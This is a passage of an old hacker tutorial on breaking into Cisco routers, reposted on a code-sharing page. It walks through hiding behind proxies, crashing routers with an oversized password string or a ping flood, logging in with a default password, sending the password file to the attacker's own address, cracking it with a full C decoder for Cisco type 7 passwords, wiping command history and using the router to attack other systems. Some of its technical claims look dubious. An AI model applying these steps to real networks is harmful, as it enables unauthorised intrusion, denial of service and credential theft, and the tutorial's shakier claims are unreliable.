?? exploiting cisco systems.txt
字號:
one like this, copy down it's IP address.
Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's
being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another
way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a
connection to the router on port 23.. If it asks for a password, but no username, you are at the router, but if it
wants a username aswell, you are probably at a firewall.
Try to find a router without a firewall, since this tutorial is on the routers and not how to get past the
firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use
port 23, this way your IP will not be logged by the router.
---------------------------------
Section 3: how to break into a cisco router
Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. You simply connect to
the router on port 23 through your proxy server, and enter a HUGE password string, something like;
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
Now wait, the cisco system might reboot, in which case you can't hack it because it is offline.. But it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.
If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,
like a huge ping. Go to dos and type "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.
While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the
reason for this is because by default, this is the router's password, and while it is temporarily disabled, it will
revert to it's default state.
Now that you have logged in, you must acquire the password file! The systems run different software, but most will
have a prompt like "htl-textil" or something, now type "?" for a list of commands, you will see a huge list of
commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is
the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to
wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept
the file that this machine is sending you, say yes and save it to disk. Logout.
You are now past the hardest part, give yourself a pat on the back and get ready to break that password!
------------------------------
Section 4: breaking the password
Now that you have acquired the password file, you have to break it so you can access the router again. To do this,
you can run a program like John the Ripper or something on the password file, and you may break it.
This is the easiest way, and the way i would recommend. Another way would be to try and decrypt it. For this you
will need some decryption software, a lot a patience, and some of the decryption sequences.
Here is a sequence for decrypting a cisco password, you have to compile this in linux:
#include <stdio.h>
#include <ctype.h>
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on
the file with John the Ripper or another password-cracker.
-------------------------------
Section 5: using the router
To use this wonderful piece of technology, you will have to be able to connect to it, use a proxy if you do not want
your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were
doing, type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's
commands, and you will be able to use most of them.
These routers usually have telnet, so you can use telnet to connect to other systems, (like unix boxes) and hack
into them. It also is equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You
may also be able to use it to intercept packets, but i do not recommend this, as it will not always work, and may
get you noticed....
---------------------------------
If you don't hack a cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something
that is LEGAL.
--
Get your free email from http://www.hackermail.com
Powered by OutBlaze
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -